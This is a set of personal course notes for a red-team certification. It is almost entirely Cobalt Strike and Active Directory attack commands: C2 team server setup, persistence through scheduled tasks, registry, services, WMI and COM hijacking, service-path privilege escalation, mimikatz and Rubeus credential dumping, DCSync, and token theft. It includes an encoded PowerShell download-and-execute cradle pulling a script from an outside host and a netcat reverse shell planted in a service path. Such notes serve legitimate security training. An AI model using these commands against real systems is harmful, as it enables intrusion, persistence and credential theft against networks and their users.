Cobalt Strike

This is a temporary notes while I finished the course then I moved to

How to set up the Team Server

#Start the teamserver and run as service
Intrusionz3r0@htb[/crto]$ tmux
Intrusionz3r0@htb[/crto]$ cd cobaltstrike
Intrusionz3r0@htb[/crto]$ sudo ./teamserver <Attacker-Box> <Password-TeamServer> c2-profiles/normal/webbug.profile

Launch cobalt strike client from the taskbar and enter the next details as follows:

#Set parameters:
Alias: Kali-Intrusionz3r0
Host: <Attacker-Box>
Port: Defaul Port
Username: Intrusionz3r0
Password: <Password-TeamServer>

Running team server as service to start automatically

Intrusionz3r0@htb[/crto]$ ip a
Intrusionz3r0@htb[/crto]$ sudo nano /etc/systemd/system/teamserver.service

[Unit]
Description=Cobalt Strike Team Server
After=network.target
StartLimitIntervalSec=0

[Service]
Type=simple
Restart=always
RestartSec=1
User=root
WorkingDirectory=/home/attacker/cobaltstrike
ExecStart=/home/attacker/cobaltstrike/teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile

[Install]
WantedBy=multi-user.target

Intrusionz3r0@htb[/crto]$ sudo systemctl daemon-reload
Intrusionz3r0@htb[/crto]$ sudo systemctl start teamserver.service
Intrusionz3r0@htb[/crto]$ sudo systemctl enable teamserver.service
Intrusionz3r0@htb[/crto]$ sudo systemctl status teamserver.service

Setting up DNS records for DNS based beacon payloads

Cobalt Funcionalities

Listeners

There are two main types of listeners:

1. Egress Listeners: These let Beacons talk to the hacker's server from outside the target network, like using the internet. The most common types are:

   • HTTP/S: Beacons communicate using web traffic (like visiting a website).

   • DNS: Beacons hide their messages in DNS requests (like asking for a website's address).

2. Peer-to-Peer Listeners: These are for communication inside the same network, where Beacons talk directly to each other instead of calling the main server.

How to Set Up an Listener:

• Go to Cobalt Strike > Listeners or click the headphone icon. 🎧
• Click Add (Below bar), choose Beacon HTTP/DNS/TCP/SMB, and name it (something easy to remember).

• Add the server's IP or domain name Ex: nickelviper.com

Setting up the SMB Listener

• Default pipe name is quite well signatured. A good strategy is to emulate names known to be used by common applications or Windows itself.

PS C:\> ls \\.\pipe\

• Select one for example: TSVCPIPE-4036c92b-65ae-4601-1337-57f7b24a0c57

• Change the final 4 characters: TSVCPIPE-4036c92b-65ae-4601-1337-57f7b24aAAAA

When Create the listener you have to specify it inside Pipename (C2) field.

Pivot Listeners

Pivot Listeners are an advanced Cobalt Strike feature that lets you use an already compromised Beacon as a "bridge" to reach other internal systems in a network.

Pivots can only be created by beacons

1. Click on beacon

2. Click on pivoting

   1. Listener

      1. Set name

      2. Set Payload

      3. Host set by default

      4. Set Port:D 1234

      5. Session set by default

PS C:\> netstat -anop tcp | findstr 1234

Set up a Script web delivery

1. Attacks > Scripted Web Delivery (S)

   1. Set URI Path

   2. Set Host (nickelviper.com)

   3. Set Port

   4. Set Listener

   5. Set type

   6. Enable Use X64 Payload

      1. Copy the payload

Hosting a file

1. Site Management > Host file

   1. Select the file

   2. Set the Local URI

   3. Set Host

   4. Set Port

   5. Set mime type (Default: Automatic)

Interact with local binaries

beacon> execute-assembly c:\path\binary.exe
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe -group=system

Cobalt Strike useful commands

The longer the sleep, the healthier the beacon due to less communication and stealth.

#Show help menu
beacon> help 
beacon> help sleep 
#Modify sleep communication time
beacon> sleep 5 
beacon> sleep 0 #Interactive mode (real time)

#Connect to Beacond bind TCP connection
beacon> connect [localhost|ip|hostname] PORT

# Impot Module  
beacon> powershell-import C:\Tools\PowerSploit\Recon\PowerView.ps1

# Execute from local binary
beacon> execute-assembly <binary-path> <params>

# ========================
# User Impersonation  
# ========================

#Retrieves the user ID of the current process running the Beacon
beacon> getuid

#Performing Pass the hash 
beacon> pth DOMAIN\username hash

# Steal access token from another process
beacon> steal_token <PID>

#Make a token to impersonate user using plaintext credentials
beacon> make_token DEV\jking <Password>

#Allows you to inject any arbitrary shellcode from .bin files
beacon> shinject <PID> <x86|x64> /path/to/binary.bin

#Inject a full beacon payload fro the specified listener
beacon> inject 4464 x64 tcp-local

#Steal token and store it
beacon> token-store steal 1234

# List all stored tokens
beacon> token-store show

# Impersonating a Stored Token
beacon> token-store use <id>

# Removing a Single Token or Purge all tokens
beacon> token-store remove <id>
beacon> token-store remove-all

# Drop the impersonation (Revert to ourself)
beacon> rev2self

Notes for CRTO

Initial Recoinassense

Identify security solutions in placed through the system.

EDR / (AV)

• CrowdStrike Falcon: csagent.exe, CSFalconService.exe

• Microsoft Defender: MsMpEng.exe, MSASCui.exe

• Elastic Security: elastic-agent.exe, elastic-endpoint.exe

• Carbon Black: cb.exe, CbDefense.exe

• SentinelOne: SentinelAgent.exe

• CylancePROTECT: CylanceSvc.exe

• Symantec: ccSvcHst.exe, Rtvscan.exe

• Trend Micro: TmCCSF.exe

• Kaspersky: avp.exe

SIEM

• Splunk: splunkd.exe

• IBM QRadar: qradar.exe

• Tanium: TaniumClient.exe

Another tools

• Sysmon: sysmon.exe

• Osquery: osqueryd.exe

• Wazuh: wazuh-agent.exe

# List the proccess running on the system
beacon> ps

#Enumerate users that are currently logged on the machine.
beacon> net logons

# Collect information about security configuration
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe -group=system

#Take screenshots (View > screenshots)
beacon> printscreen
beacon> printshot
beacon> screenwatch

#Enable keylogger.
beacon> keylogger
beacon> jobs
beacon> jobkill 6

#Copy data from clipboard
beacon> clipboard

Host Persistence

Tool: SharPersist

Aggressor Scripts: persistence-sharpersist

Powershell Executable file location: PowerShell_Executables_File_System_Locations.php

Powerlurck: PowerLurk

#Powershell paths
C:\windows\syswow64\windowspowershell\v1.0\powershell
C:\Windows\System32\WindowsPowerShell\v1.0\powershell

# Encode Payload on Windows
PS C:\> $str = 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/shell.ps1"))'
PS C:\> [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))

# Encode Payload on Linux 
Intrusionz3r0@htb[/crto]$ echo -n "IEX(New-Object Net.WebClient).downloadString('http://nickelviper.com/shell.ps1')" | iconv -t UTF-16LE | base64 -w 0;echo

#Execute command
PS C:\> powershell -nop -enc <BASE64_ENCODED_PAYLOAD>

#Task Scheduler (Create scheduled tasks that execute payloads at specific triggers (logon, hourly, boot, etc.).)
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "ARGUMENT" -n "NAME" -m add/remove/check/list -o hourly
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "ARGUMENT" -n "NAME" -m add/remove/check/list -o logon

#Startup Folder (Place an executable/script in the user's Startup folder to execute at login.)
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAKABOAG<SNIF>" -f "Filenameoutput" -m add 

# Registry Autorun (Modify Registry keys (HKCU or HKLM) to auto-run payloads at user logon or system startup.)
beacon> cd C:\Windows\System32\spool\drivers\color
beacon> upload C:\Payloads\http_x64.exe
beacon> mv http_x64.exe Timer.exe
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t reg -c "C:\ProgramData\Timer.exe" -a "/q /n" -k "hkcurun" -v "Timer" -m add

# Windows Service (Create or modify a Windows service to execute your payload, typically set to start automatically.)
beacon> cd C:\Windows
beacon> upload C:\Payloads\tcp-local_x64.svc.exe
beacon> mv tcp-local_x64.svc.exe legit-svc.exe
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t service -c "C:\Windows\legit-svc.exe" -n "legit-svc" -m add

# Register WMI event Register a WMI event to trigger a payload on specific actions (e.g., when opening notepad.exe).
beacon> cd C:\Windows
beacon> upload C:\Payloads\dns_x64.exe
beacon> powershell-import C:\Tools\PowerLurk.ps1
beacon> powershell Register-MaliciousWmiEvent -EventName WmiBackdoor -PermanentCommand "C:\Windows\dns_x64.exe" -Trigger ProcessStart -ProcessName notepad.exe
#Obtain information about WmiEvent
beacon> Get-WmiEvent -Name WmiBackdoor
#Remove Wmi Event  
beacon> Get-WmiEvent -Name WmiBackdoor  | Remove-WmiObject

Hijacking COM objects

Process Monitor: procmon

Use process monitor and set filters as follows:

Look for any particular process is loading a .dll or .exe and take note about CLSID.

#Check whether exists or not.
PS C:\> Get-Item -Path "HKLM:\Software\Classess\CLSID\{ID}\InprocServer32"
PS C:\> Get-Item -Path "HKCU:\Software\Classess\CLSID\{ID}\InprocServer32"

#Hijacking COM object
PS C:\> New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{AB8902B4-09CA-4bb6-B78D-A8F59079ABD5}"
PS C:\> New-Item -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079ABD5}" -Name "InprocServer32" -Value "C:\PATH\http_x64.dll"
PS C:\> New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079ABD5}\InprocServer32" -Name "ThreadingModel" -Value "Both"

#Get the object
PS C:\> Get-ChildItem -Path "Registry::HKCR\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079ABD5}"

Script to detect CLSID with Powershell

$Tasks = Get-ScheduledTask

foreach ($Task in $Tasks)
{
    if ($Task.Actions.ClassId -ne $null)
    {
        if ($Task.Triggers.Enabled -eq $true)
        {
            if ($Task.Principal.GroupId -eq "Users")
            {
                Write-Host "Task Name: " $Task.TaskName
                Write-Host "Task Path: " $Task.TaskPath
                Write-Host "CLSID: " $Task.Actions.ClassId
                Write-Host
            }
        }
    }
}

Host Privilege Escalation

It is recommended to use TCP beacons bound to localhost only for privilege escalation

Privilege escalation via Unquoted Service Path

Requirements:

1. Service with Unquoted Service Path

2. Having Write Permission (Ex: BUILTTIN/USERS)

# Enumerate Services installed on server
beacon> run wmic service get name, pathname
beacon> run sc query
beacon> run sc qc VulnService1
beacon> run sc stop VulnService1
beacon> run sc start VulnService1
beacon> powershell Get-Service | fl
beacon> powershell Stop-Service -Name 'IObitUnSvr'
beacon> powershell Start-Service -Name 'IObitUnSvr'
beacon> powershell Restart-Service -Name 'IObitUnSvr'

#Modify the binaries execution
beacon> powershell Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Windows\System32\spool\drivers\color\nc.exe -e cmd.exe 10.10.10.205 443"
beacon> run sc config <ServiceName> binpath="COMMAND-HERE"

#Shutdown machine
beacon> run shutdown -r -t 0

#Enumerate the system
beacon> execute-assembly C:\Tools\SharpUp\SharpUp\bin\Release\SharpUp.exe audit
#Enumerate ModifiableServices
beacon> execute-assembly C:\Tools\SharpUp\SharpUp\bin\Release\SharpUp.exe ModifiableServices

#Enumerate ACLs
beacon> run icacls "C:\PATH"
beacon> powershell Get-Acl -Path "C:\PATH" | fl

#Exploitation with writing permission on folder
beacon> cd C:\Program Files\Vulnerable Services
beacon> upload C:\Payloads\tcp-local_x64.svc.exe
beacon> mv tcp-local_x64.svc.exe Service.exe
beacon> run sc stop VulnService1
beacon> run sc start VulnService1
beacon> connect localhost 4444

#Exploitation with permission to modify the binPath
beacon> run sc qc VulnService2
beacon> run sc config VulnService2 binPath= C:\Windows\System32\spool\drivers\color\evil.exe
beacon> run sc stop VulnService2
beacon> run sc start VulnService2
beacon> connect localhost 4444

#Exploitation via weak binary permission
#    Check ACLs for Modify permissions
#    Overwrite the binary to abuse of it
beacon> upload Service 3.exe
beacon> run sc start VulnService3
beacon> connect localhost 4444

Script to obtain ACLs: Get-ServiceAcl

beacon> powershell-import Get-ServiceAcl.ps1
beacon> powershell Get-ServiceAcl -Name VulnService2 | select -expand Access

UAC Bypass

beacon> elevate uac-schtasks tcp-local
beacon> run netstat -anop tcp
beacon> connect localhost <PORT>

Credential Theft

! Run command as SYSTEM

@ Use current token

#Dump credentilas/hashes from LSASS.exe
beacon> mimikatz !sekurlsa::logonpasswords

#Dump kerberos encryption keys of current logged users
beacon> mimikatz !sekurlsa::ekeys

#Dump SAM database
beacon> mimikatz !lsadump::sam

#Dump domain cached credentials (DCC) - Not NTLM
beacon> mimikatz !lsadump::cache

# Dump TGT/TGS Tickets
beacon> mimikatz !sekurlsa::tickets
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x14794e /nowrap
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe monitor /interval:10 /nowrap

# DCSync Attack
beacon> make_token DEV\username password
beacon> dcsync dev.cyberbotic.io DEV\krbtgt
beacon> mimikatz !lsadump::dcsync /all /domain:dev.cyberbotic.io

How to crack Domain cached credentials (DCC): https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-and-cracking-mscash-cached-domain-credentials#cracking-mscash-mscache-with-hashcat

Domain Reconnaissance

Powerview: powerview

Powershell CMDLET: using-ad-module

# =============================================
# LOAD POWERVIEW INTO COBALT STRIKE SESSION
# =============================================
beacon> powershell-import C:\Tools\PowerSploit\Recon\PowerView.ps1

# ========================
# BASIC DOMAIN ENUMERATION  
# ========================
beacon> powerpick Get-Domain -Domain <>  # Retrieve domain information
beacon> powerpick Get-DomainSID  # Get domain security identifier
beacon> powerpick Get-DomainController | select Forest, Name, OSVersion | fl  # List domain controllers
beacon> powerpick Get-ForestDomain -Forest <>  # Get forest information
beacon> powerpick Get-DomainPolicyData | select -expand SystemAccess  # View domain password policies

# ===========================
# USER ACCOUNT ENUMERATION
# ===========================
beacon> powerpick Get-DomainUser -Identity jking -Properties DisplayName, MemberOf | fl  # Get specific user details
beacon> powerpick Get-DomainUser | select cn,serviceprincipalname  # Find all users with SPNs (Kerberoasting)
beacon> powerpick Get-DomainUser -PreauthNotRequired  # Find AS-REP roastable accounts
beacon> powerpick Get-DomainUser -TrustedToAuth  # Find accounts with unconstrained delegation

# =============================
# COMPUTER ACCOUNT ENUMERATION
# =============================
beacon> powerpick Get-DomainComputer -Properties DnsHostName | sort -Property DnsHostName  # List all domain computers
beacon> powerpick Get-DomainComputer -Unconstrained | select cn, dnshostname  # Find computers with unconstrained delegation
beacon> powerpick Get-DomainComputer -TrustedToAuth | select cn, msdsallowedtodelegateto  # Find computers with constrained delegation

# ========================
# DOMAIN STRUCTURE
# ========================
beacon> powerpick Get-DomainOU -Properties Name | sort -Property Name  # List all Organizational Units
beacon> powerpick Get-DomainComputer -SearchBase "OU=Workstations,DC=dev,DC=cyberbotic,DC=io" | select dnsHostName  # Find computers in specific OU

# ========================
# GROUP ENUMERATION
# ========================
beacon> powerpick Get-DomainGroup | where Name -like "*Admins*" | select SamAccountName  # Find administrative groups
beacon> powerpick Get-DomainGroupMember -Identity "Domain Admins" | select MemberDistinguishedName  # List Domain Admins members
beacon> powerpick Get-DomainGroupMember -Identity "Domain Admins" -Recurse | select MemberDistinguishedName  # Recursively list all members

# ========================
# GROUP POLICY (GPO) ENUMERATION
# ========================
beacon> powerpick Get-DomainGPO -Properties DisplayName | sort -Property DisplayName  # List all GPOs
beacon> powerpick Get-DomainOU -GPLink "{AD2F58B9-97A0-4DBC-A535-B4ED36D5DD2F}" | select distinguishedName  # Find OUs linked to specific GPO
beacon> powerpick Get-DomainGPOLocalGroup | select GPODisplayName, GroupName  # Find local groups defined in GPOs
beacon> powerpick Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName, GPODisplayName, ContainerName, ComputerName | fl  # Find users with local admin via GPO

# ========================
# DOMAIN TRUSTS AND ACLS
# ========================
beacon> powerpick Get-DomainTrust  # Enumerate domain trusts
beacon> powerpick Find-InterestingDomainAcl -ResolveGUIDs  # Find interesting access control entries

# =================================
# LATERAL MOVEMENT TECHNIQUES
# =================================
beacon> powerpick Find-LocalAdminAccess -Verbose  # Find systems where current user has admin rights
beacon> powerpick Invoke-CheckLocalAdminAccess -ComputerName <server_fqdn>  # Check admin access on specific system
beacon> powerpick Find-PSRemotingLocalAdminAccess -ComputerName <server_fqdn>  # Check PowerShell Remoting access
beacon> powerpick Find-WMILocalAdminAccess -ComputerName <server_fqdn>  # Check WMI access

# =================================
# USER SESSION HUNTING
# =================================
beacon> powerpick Find-DomainUserLocation -Verbose  # Find where users are logged in
beacon> powerpick Find-DomainUserLocation -UserGroupIdentity "Domain Users"  # Find sessions by group
beacon> powerpick Invoke-UserHunter -CheckAccess  # Hunt users + verify admin access
beacon> powerpick Find-DomainUserLocation -CheckAccess  # Alternative method
beacon> powerpick Find-DomainUserLocation –Stealth  # Stealthy approach (focus on fileservers)
beacon> powerpick Invoke-StealthUserHunter  # Enhanced version

# =================================
# ADVANCED HUNTING TECHNIQUES
# =================================
beacon> powerpick Invoke-ProcessHunter  # Hunt for specific processes
beacon> powerpick Invoke-UserEventHunter  # Search DC event logs for logon events

# =================================
# SHARE AND FILE ENUMERATION
# =================================
beacon> powerpick Invoke-ShareFinder –Verbose  # Find network shares
beacon> powerpick Invoke-FileFinder -Verbose  # Search for sensitive files
beacon> powerpick Get-NetFileServer  # List all fileservers in domain


# =================================
# Domain enumeration using Shapview
# =================================
beacon> execute-assembly C:\Tools\SharpView\SharpView\bin\Release\SharpView.exe Get-Domain

# =================================
# Domain enumeration using ADSearch
# =================================

beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "objectCategory=user"

beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=group)(cn=*Admins*))"

beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=group)(cn=MS SQL Admins))" --attributes cn,member

# Kerberostable Users
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName

# ASEPROAST
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname

# Unconstrained Delegation
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname

# Constrained Delegation
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json

# Additionally, the `--json` parameter can be used to format the output in JSON

User impersonation

Pass the ticket

#Retrieves the user ID of the current process running the Beacon
beacon> getuid

#Performing Pass the hash 
beacon> pth DOMAIN\username hash

#Drop impersonation
beacon> rev2self

Stealing tokens

Allows you to steal the token from another process

# Steal access token from another process
beacon> steal_token <PID>

# Drop the impersonation (Revert to ourself)
beacon> rev2self

Token store

Improved version of steal_token

#Steal token and store it
beacon> token-store steal 1234

# List all stored tokens
beacon> token-store show

# Impersonating a Stored Token
beacon> token-store use <id>

# Removing a Single Token or Purge all tokens
beacon> token-store remove <id>
beacon> token-store remove-all

# Drop the impersonation (Revert to ourself)
beacon> rev2self

Making tokens

Allows you to impersonate a user if you know their plaintext password.

#Make a token to impersonate user using plaintext credentials
beacon> make_token DEV\jking <Password>

Injecting arbitrary shellcode into a process

#Allows you to inject any arbitrary shellcode from .bin files
beacon> shinject <PID> <x86|x64> /path/to/binary.bin
#Inject a full beacon payload fro the specified listener
beacon> inject 4464 x64 tcp-local

# =================================
# Pass the ticket using rubeus
# =================================

#Request TGT
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
[+] LUID 0x798c2c
[+] ProcessID 4748

#Create sacrificial proccess
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
[+] LUID 0x798c2c

#Inject ticket into 0x798c2c
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /luid:0x798c2c /ticket:doIFuj[...snip...]lDLklP

# Impersonate process created with rubeus.exe
beacon> steal_token 4748

#Drop impersonation and kill process
beacon> rev2self
beacon> kill 4748


# =================================
# OverPassTheHash using rubeus
# =================================

# Calculate all hash formats
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe  hash /password:Password123! /user:harmj0y /domain:testlab.local

# Using rc4 NTLM Hash
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:jking /ntlm:59fc0f884922b4ce376051134c71e22c /nowrap

# Using aes256 hash (Recommended for better opsec)
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:jking /aes256:4a8a74daad837ae09e9ecc8c2f1b89f960188cb934db6d4bbebade8318ae57c6 /domain:DEV /opsec /nowrap